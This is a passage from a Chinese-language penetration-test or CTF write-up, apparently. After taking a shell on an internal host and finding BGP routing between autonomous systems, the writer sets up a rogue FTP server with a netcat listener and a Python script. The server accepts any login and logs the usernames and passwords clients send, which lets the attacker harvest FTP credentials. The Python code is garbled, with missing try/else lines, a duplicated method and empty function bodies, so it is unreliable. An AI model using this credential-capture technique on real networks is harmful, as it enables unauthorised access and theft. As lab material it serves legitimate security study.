5.经过详细的内网扫描可以发现,子网段中有少许存活机器,但没有实际用处,只有一台10.120.15.10开放21Ftp服务,匿名登录没有信息,但重要的Ftp应该就是它。在内网扫描时要注意nmap容易阻塞网络,可以用nc或sh脚本进行ping扫描。我们将目标重新拉回已控主机10.99.64.2,netstat -pantu发现有2601端口bgp服务运行,同时bgp在三个自治域间都有通联,我们的shell在AS100中,Tickets页面提示的Ftp在CastCom即AS200中,连接Ftp的机器很可以能在AS300中,根据网卡情况eth1应该连接AS300,eth2应该连接AS200。
7.nc -l -p 21 发现有来自21端口的访问,但是缺少FTP状态码,不会发送登录密码,所以还需要在目标上架设完整的FTP服务器,目标有python3环境。
#!/usr/bin/env python
# --*-- coding: utf-8 --*--
import socket
import threading
import os
import stat
import sys
import time
allow_delete = False
HOST = socket.gethostbyname(socket.gethostname( ))
except socket.gaierror:
HOST = ''
HOST = ''
PORT = 21 # command port
CWD = os.getenv('HOME')
def log(func, cmd):
logmsg = time.strftime("%Y-%m-%d %H-%M-%S [-] " + func)
print("\033[31m%s\033[0m: \033[32m%s\033[0m" % (logmsg, cmd))
class FtpServerProtocol(threading.Thread):
def __init__(self, commSock, address):
self.authenticated = False
self.pasv_mode = False
self.rest = False
self.cwd = CWD
self.commSock = commSock # communication socket as command channel
self.address = address
def run(self):
receive commands from client and execute commands
while True:
data = self.commSock.recv(1024).rstrip()
cmd = data.decode('utf-8')
except AttributeError:
cmd = data
log('Received data', cmd)
if not cmd:
except socket.error as err:
log('Receive', err)
cmd, arg = cmd[:4].strip().upper(), cmd[4:].strip( ) or None
func = getattr(self, cmd)
except AttributeError as err:
self.sendCommand('500 Syntax error, command unrecognized. '
'This may include errors such as command line too long.\r\n')
log('Receive', err)
## Create Ftp data transport channel ##
def startDataSock(self):
log('startDataSock', 'Opening a data channel')
self.dataSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.pasv_mode:
self.dataSock, self.address = self.serverSock.accept( )
self.dataSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.dataSock.connect((self.dataSockAddr, self.dataSockPort))
except socket.error as err:
log('startDataSock', err)
def stopDataSock(self):
log('stopDataSock', 'Closing a data channel')
self.dataSock.close( )
if self.pasv_mode:
self.serverSock.close( )
except socket.error as err:
log('stopDataSock', err)
def sendCommand(self, cmd):
def sendData(self, data):
## Ftp services and functions ##
def USER(self, user):
log("USER", user)
if not user:
self.sendCommand('501 Syntax error in parameters or arguments.\r\n')
self.sendCommand('331 User name okay, need password.\r\n')
self.username = user
def PASS(self, passwd):
log("PASS", passwd)
if not passwd:
self.sendCommand('501 Syntax error in parameters or arguments.\r\n')
elif not self.username:
self.sendCommand('503 Bad sequence of commands.\r\n')
self.sendCommand('230 User logged in, proceed.\r\n')
self.passwd = passwd
self.authenticated = True
def TYPE(self, type):
log('TYPE', type)
self.mode = type
if self.mode == 'I':
self.sendCommand('200 Binary mode.\r\n')
elif self.mode == 'A':
self.sendCommand('200 Ascii mode.\r\n')
def PASV(self, cmd):
log("PASV", cmd)
self.pasv_mode = True
self.serverSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.serverSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.serverSock.bind((HOST, 0))
addr, port = self.serverSock.getsockname( )
#self.sendCommand('277 Entering Passve mode (%s,%d,%d).\r\n' %
# (addr.replace('.', ','), (port / 256), (port % 256)))
#self.sendCommand('227 Entering Passive Mode (%s,%u,%u).\r\n' % (','.join(addr.split('.')), port>>8&0xFF, port&0xFF))
#self.sendCommand('227 Entering Passive Mode (%s,%u,%u).\r\n' % (','.join(addr.split('.')), port>>8&0xFF, port&0xFF))
self.sendCommand('227 Entering Passive Mode (%s,%u,%u).\r\n' %
(','.join(addr.split('.')), port>>8&0xFF, port&0xFF))
def PORT(self, pair):
log('PORT', pair)
pair = pair.split(',')
ip, p1, p2 = ('.'.join(pair[:4]), pair[5], pair[6])
self.dataSockAddr = ip
self.dataSockPort = (256 * p1) + p2
self.sendCommand('200 Ok.\r\n')
def PORT(self,cmd):
log("PORT: ", cmd)
if self.pasv_mode:
self.pasv_mode = False
self.sendCommand('200 Get port.\r\n')
def LIST(self, dirpath):
if not self.authenticated:
self.sendCommand('530 User not logged in.\r\n')
if not dirpath:
pathname = os.path.abspath(os.path.join(self.cwd, '.'))
elif dirpath.startswith(os.path.sep):
pathname = os.path.abspath(dirpath)
pathname = os.path.abspath(os.path.join(self.cwd, dirpath))
log('LIST', pathname)
if not self.authenticated:
self.sendCommand('530 User not logged in.\r\n')
elif not os.path.exists(pathname):
self.sendCommand('550 LIST failed Path name not exists.\r\n')
self.sendCommand('150 Here is listing.\r\n')
self.startDataSock( )
if not os.path.isdir(pathname):
fileMessage = fileProperty(pathname)
for file in os.listdir(pathname):
fileMessage = fileProperty(os.path.join(pathname, file))
self.stopDataSock( )
self.sendCommand('226 List done.\r\n')
def NLIST(self, dirpath):
def CWD(self, dirpath):
pathname = dirpath.endswith(os.path.sep) and dirpath or os.path.join(self.cwd, dirpath)
log('CWD', pathname)
if not os.path.exists(pathname) or not os.path.isdir(pathname):
self.sendCommand('550 CWD failed Directory not exists.\r\n')
self.cwd = pathname
self.sendCommand('250 CWD Command successful.\r\n')
def PWD(self, cmd):
log('PWD', cmd)
self.sendCommand('257 "%s".\r\n' % self.cwd)
def CDUP(self, cmd):
self.cwd = os.path.abspath(os.path.join(self.cwd, '..'))
log('CDUP', self.cwd)
self.sendCommand('200 Ok.\r\n')
def DELE(self, filename):
pathname = filename.endswith(os.path.sep) and filename or os.path.join(self.cwd, filename)
log('DELE', pathname)
if not self.authenticated:
self.sendCommand('530 User not logged in.\r\n')
elif not os.path.exists(pathname):
self.send('550 DELE failed File %s not exists.\r\n' % pathname)
elif not allow_delete:
self.send('450 DELE failed delete not allow.\r\n')
self.sendCommand('250 File deleted.\r\n')
def MKD(self, dirname):
pathname = dirname.endswith(os.path.sep) and dirname or os.path.join(self.cwd, dirname)
log('MKD', pathname)
if not self.authenticated:
self.sendCommand('530 User not logged in.\r\n')
self.sendCommand('257 Directory created.\r\n')
except OSError:
self.sendCommand('550 MKD failed Directory "%s" already exists.\r\n' % pathname)
def RMD(self, dirname):
import shutil
pathname = dirname.endswith(os.path.sep) and dirname or os.path.join(self.cwd, dirname)
log('RMD', pathname)
if not self.authenticated:
self.sendCommand('530 User not logged in.\r\n')
elif not allow_delete:
self.sendCommand('450 Directory deleted.\r\n')
elif not os.path.exists(pathname):
self.sendCommand('550 RMDIR failed Directory "%s" not exists.\r\n' % pathname)
self.sendCommand('250 Directory deleted.\r\n')
def RNFR(self, filename):
pathname = filename.endswith(os.path.sep) and filename or os.path.join(self.cwd, filename)
log('RNFR', pathname)
if not os.path.exists(pathname):
self.sendCommand('550 RNFR failed File or Directory %s not exists.\r\n' % pathname)
self.rnfr = pathname
def RNTO(self, filename):
pathname = filename.endswith(os.path.sep) and filename or os.path.join(self.cwd, filename)
log('RNTO', pathname)
if not os.path.exists(os.path.sep):
self.sendCommand('550 RNTO failed File or Direcotry %s not exists.\r\n' % pathname)
os.rename(self.rnfr, pathname)
except OSError as err:
log('RNTO', err)
def REST(self, pos):
self.pos = int(pos)
log('REST', self.pos)
self.rest = True
self.sendCommand('250 File position reseted.\r\n')
def RETR(self, filename):
pathname = os.path.join(self.cwd, filename)
log('RETR', pathname)
if not os.path.exists(pathname):
if self.mode=='I':
file = open(pathname, 'rb')
file = open(pathname, 'r')
except OSError as err:
log('RETR', err)
self.sendCommand('150 Opening data connection.\r\n')
if self.rest:
self.rest = False
self.startDataSock( )
while True:
data = file.read(1024)
if not data: break
file.close( )
self.stopDataSock( )
self.sendCommand('226 Transfer complete.\r\n')
def STOR(self, filename):
if not self.authenticated:
self.sendCommand('530 STOR failed User not logged in.\r\n')
pathname = os.path.join(self.cwd, filename)
log('STOR', pathname)
if self.mode == 'I':
file = open(pathname, 'wb')
file = open(pathname, 'w')
except OSError as err:
log('STOR', err)
self.sendCommand('150 Opening data connection.\r\n' )
self.startDataSock( )
while True:
data = self.dataSock.recv(1024)
if not data: break
file.close( )
self.stopDataSock( )
self.sendCommand('226 Transfer completed.\r\n')
def APPE(self, filename):
if not self.authenticated:
self.sendCommand('530 APPE failed User not logged in.\r\n')
pathname = filename.endswith(os.path.sep) and filename or os.path.join(self.cwd, filename)
log('APPE', pathname)
self.sendCommand('150 Opening data connection.\r\n')
self.startDataSock( )
if not os.path.exists(pathname):
if self.mode == 'I':
file = open(pathname, 'wb')
file = open(pathname, 'w')
while True:
data = self.dataSock.recv(1024)
if not data:
n = 1
while not os.path.exists(pathname):
filename, extname = os.path.splitext(pathname)
pathname = filename + '(%s)' %n + extname
n += 1
if self.mode == 'I':
file = open(pathname, 'wb')
file = open(pathname, 'w')
while True:
data = self.dataSock.recv(1024)
if not data:
file.close( )
self.stopDataSock( )
self.sendCommand('226 Transfer completed.\r\n')
def SYST(self, arg):
log('SYS', arg)
self.sendCommand('215 %s type.\r\n' % sys.platform)
def HELP(self, arg):
log('HELP', arg)
help = """
USER [name], Its argument is used to specify the user's string. It is used for user authentication.
PASS [password], Its argument is used to specify the user password string.
PASV The directive requires server-DTP in a data port.
PORT [h1, h2, h3, h4, p1, p2] The command parameter is used for the data connection data port
LIST [dirpath or filename] This command allows the server to send the list to the passive DTP. If
the pathname specifies a path or The other set of files, the server sends a list of files in
the specified directory. Current information if you specify a file path name, the server will
send the file.
CWD Type a directory path to change working directory.
PWD Get current working directory.
CDUP Changes the working directory on the remote host to the parent of the current directory.
DELE Deletes the specified remote file.
MKD Creates the directory specified in the RemoteDirectory parameter on the remote host.
RNFR [old name] This directive specifies the old pathname of the file to be renamed. This command
must be followed by a "heavy Named "command to specify the new file pathname.
RNTO [new name] This directive indicates the above "Rename" command mentioned in the new path name
of the file. These two Directive together to complete renaming files.
REST [position] Marks the beginning (REST) The argument on behalf of the server you want to re-start
the file transfer. This command and Do not send files, but skip the file specified data checkpoint.
RETR This command allows server-FTP send a copy of a file with the specified path name to the data
connection The other end.
STOR This command allows server-DTP to receive data transmitted via a data connection, and data is
stored as A file server site.
APPE This command allows server-DTP to receive data transmitted via a data connection, and data is stored
as A file server site.
SYS This command is used to find the server's operating system type.
HELP Displays help information.
QUIT This command terminates a user, if not being executed file transfer, the server will shut down
Control connection\r\n.
def QUIT(self, arg):
log('QUIT', arg)
self.sendCommand('221 Goodbye.\r\n')
def sendWelcome(self):
when connection created with client will send a welcome message to the client
self.sendCommand('220 Welcome.\r\n')
def serverListener( ):
global listen_sock
listen_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_sock.bind((HOST, PORT))
log('Server started', 'Listen on: %s, %s' % listen_sock.getsockname( ))
while True:
connection, address = listen_sock.accept( )
f = FtpServerProtocol(connection, address)
f.start( )
log('Accept', 'Created a new connection %s, %s' % address)
if __name__ == "__main__":
log('Start ftp server', 'Enter q or Q to stop ftpServer...')
listener = threading.Thread(target=serverListener)
listener.start( )
if sys.version_info[0] < 3:
input = raw_input
if input().lower() == "q":
listen_sock.close( )
log('Server stop', 'Server closed')
sys.exit( )